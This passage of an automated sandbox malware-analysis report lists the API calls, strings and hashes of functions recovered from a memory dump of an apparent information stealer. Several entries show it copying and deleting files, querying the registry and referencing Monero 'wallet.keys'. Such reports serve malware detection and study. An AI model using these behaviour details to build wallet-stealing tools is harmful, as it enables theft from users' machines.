                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: dda9cb27b4c8513b70f4b7c0fc4ed869ef146fb3369ed2c6ce76d4949e3573ae
                            • Instruction ID: 38aa2d2837a1247cfd1439d7271eefffb1cf5691b50c57322996df3599613793
                            • Opcode Fuzzy Hash: dda9cb27b4c8513b70f4b7c0fc4ed869ef146fb3369ed2c6ce76d4949e3573ae
                            • Instruction Fuzzy Hash: 04115EB1A44205EBEB14CF94ED4AFBBBBBCEB04B11F10415AFE05B7690D77458089BA1
                            Function 00359260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                            Download Yara Rule
                            APIs
                            • StrStrA.SHLWAPI(00FBDFF8,?,?,?,0035140C,?,00FBDFF8,00000000), ref: 0035926C
                            • lstrcpyn.KERNEL32(0058AB88,00FBDFF8,00FBDFF8,?,0035140C,?,00FBDFF8), ref: 00359290
                            • lstrlen.KERNEL32(?,?,0035140C,?,00FBDFF8), ref: 003592A7
                            • wsprintfA.USER32 ref: 003592C7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpynlstrlenwsprintf
                            • String ID: %s%s
                            • API String ID: 1206339513-3252725368
                            • Opcode ID: dca9c0b5466907e77fcf895fb58021ccea2c26737915cea6ed69f37a49dc8115
                            • Instruction ID: f6db61dc3d8a2ece464cc997520428bd8c82e72d4e2ff1ef0666c3f41e4dbfac
                            • Opcode Fuzzy Hash: dca9c0b5466907e77fcf895fb58021ccea2c26737915cea6ed69f37a49dc8115
                            • Instruction Fuzzy Hash: 3D01E575500208FFDB04DFE8C989EAE7BB9EB48391F108549FD09AB204C631EA44EB91
                            Function 003412A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003412B4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003412BB
                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003412D7
                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003412F5
                            • RegCloseKey.ADVAPI32(?), ref: 003412FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 263cabebc37dfa5a62d0f570fc77d643f1863c0bab09f675c6e3dd5ee605689a
                            • Instruction ID: 39670efc6b9468fc9d4759eb28d16fd2ec416dac2ccdaf0acbdafa9cebdac5c4
                            • Opcode Fuzzy Hash: 263cabebc37dfa5a62d0f570fc77d643f1863c0bab09f675c6e3dd5ee605689a
                            • Instruction Fuzzy Hash: 8B0136B5A40208BBEB00DFD0DC49FAEB7B8EB48701F008155FE05E7280D6749A059F51
                            Function 0035C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Type
                            • String ID:
                            • API String ID: 2109742289-3916222277
                            • Opcode ID: 15b52129ad3847ab00921acf5019cdac7094c9b5baf5b56be55f59ac9ad12bde
                            • Instruction ID: cc2188a9b85956695fbb5e2d0762e505801a414b56f0e78ac613a7ed2ca26987
                            • Opcode Fuzzy Hash: 15b52129ad3847ab00921acf5019cdac7094c9b5baf5b56be55f59ac9ad12bde
                            • Instruction Fuzzy Hash: 3A41E4B151079C5EDB228B24CC84FFBBBFCAB45709F1454A8ED8A86192D3719A49CF60
                            Function 00356630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00356663
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00356726
                            • ExitProcess.KERNEL32 ref: 00356755
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                            • String ID: <
                            • API String ID: 1148417306-4251816714
                            • Opcode ID: 33cf4cd9a0d7230bb50784e71f3e0c8dead8954733c9da6839fe5248f4c282dc
                            • Instruction ID: aa5b2399b5fcf14c51f92634918ddb681e8063c609904406c604767d67c52a22
                            • Opcode Fuzzy Hash: 33cf4cd9a0d7230bb50784e71f3e0c8dead8954733c9da6839fe5248f4c282dc
                            • Instruction Fuzzy Hash: CC314CB1801218ABDB15EB90DC82FDEBB78AF14301F405189FA097A1A1DF746B4DDF66
                            Function 003587C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00360E28,00000000,?), ref: 0035882F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00358836
                            • wsprintfA.USER32 ref: 00358850
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: dc430518abbfaed286239373312ad90ebce21f070869f8b2265863853d0811ac
                            • Instruction ID: 5ba2b5ea4530323496509f912a720b1dfecd6a4e722db1f58b0cc3ef1e0db129
                            • Opcode Fuzzy Hash: dc430518abbfaed286239373312ad90ebce21f070869f8b2265863853d0811ac
                            • Instruction Fuzzy Hash: 3C2130B1A40204AFEB04DFD4DD49FAEBBB8FB48701F104119FA05B7294C77999049FA1
                            Function 00358D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0035951E,00000000), ref: 00358D5B
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00358D62
                            • wsprintfW.USER32 ref: 00358D78
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesswsprintf
                            • String ID: %hs
                            • API String ID: 769748085-2783943728
                            • Opcode ID: e8751c2a95b169f4046c2bb5ca64522aa47ef8cb052cb9edaefe606f34025025
                            • Instruction ID: 064bd42ce3ca9b20cf003d0ccd7fe215ef031efe5cf8a0bf27fe6bff5430d769
                            • Opcode Fuzzy Hash: e8751c2a95b169f4046c2bb5ca64522aa47ef8cb052cb9edaefe606f34025025
                            • Instruction Fuzzy Hash: A5E0ECB5A40208BBE714DB94DD0AE6977B8EB54702F004195FE09A7280DA719E14AFA6
                            Function 0034A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                              • Part of subcall function 00358B60: GetSystemTime.KERNEL32(00360E1A,00FAF740,003605AE,?,?,003413F9,?,0000001A,00360E1A,00000000,?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 00358B86
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034A2E1
                            • lstrlen.KERNEL32(00000000,00000000), ref: 0034A3FF
                            • lstrlen.KERNEL32(00000000), ref: 0034A6BC
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                            • DeleteFileA.KERNEL32(00000000), ref: 0034A743
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 6b2d901d348f9c691f919560d0af21352d378de0a232e590c32b261f646888bd
                            • Instruction ID: 5ac4cf1df55c54c7ab0e750f2977da6f910d2d9658ef3d2b9518c3554e56dcc2
                            • Opcode Fuzzy Hash: 6b2d901d348f9c691f919560d0af21352d378de0a232e590c32b261f646888bd
                            • Instruction Fuzzy Hash: C1E1E6728105189ADB06FBA4DC92DEE7738BF14301F508259F9177A0A1EF346A4DEB62
                            Function 0034D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                              • Part of subcall function 00358B60: GetSystemTime.KERNEL32(00360E1A,00FAF740,003605AE,?,?,003413F9,?,0000001A,00360E1A,00000000,?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 00358B86
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034D481
                            • lstrlen.KERNEL32(00000000), ref: 0034D698
                            • lstrlen.KERNEL32(00000000), ref: 0034D6AC
                            • DeleteFileA.KERNEL32(00000000), ref: 0034D72B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 2453f77522e816bf7c4cef24ba30956b26fe065f130677325ee6004f8dc333cb
                            • Instruction ID: a99f01e393818aab28a38fb7aec43687f8a62048e02c8a4a4dc01fc6b5530bad
                            • Opcode Fuzzy Hash: 2453f77522e816bf7c4cef24ba30956b26fe065f130677325ee6004f8dc333cb
                            • Instruction Fuzzy Hash: 5A9103729105189BDB06FBA4DC96DEE7738BF14301F504259F907BA0A1EF346A0DEB62
                            Function 0034D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                              • Part of subcall function 00358B60: GetSystemTime.KERNEL32(00360E1A,00FAF740,003605AE,?,?,003413F9,?,0000001A,00360E1A,00000000,?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 00358B86
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034D801
                            • lstrlen.KERNEL32(00000000), ref: 0034D99F
                            • lstrlen.KERNEL32(00000000), ref: 0034D9B3
                            • DeleteFileA.KERNEL32(00000000), ref: 0034DA32
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 548faa1e2596d57580feec33602671945b1f69d3f6c2b857045b0c6420592a86
                            • Instruction ID: e9c4341c507bc5c08a4f93dd15eb198634b6f3592e4209d6f61663d46d8803e5
                            • Opcode Fuzzy Hash: 548faa1e2596d57580feec33602671945b1f69d3f6c2b857045b0c6420592a86
                            • Instruction Fuzzy Hash: EB8100729105189ADB06FBA4DC96DEE7738BF14301F504219F907BA0A1EF346A0DEB62
                            Function 0034F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                              • Part of subcall function 003499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003499EC
                              • Part of subcall function 003499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00349A11
                              • Part of subcall function 003499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00349A31
                              • Part of subcall function 003499C0: ReadFile.KERNEL32(000000FF,?,00000000,0034148F,00000000), ref: 00349A5A
                              • Part of subcall function 003499C0: LocalFree.KERNEL32(0034148F), ref: 00349A90
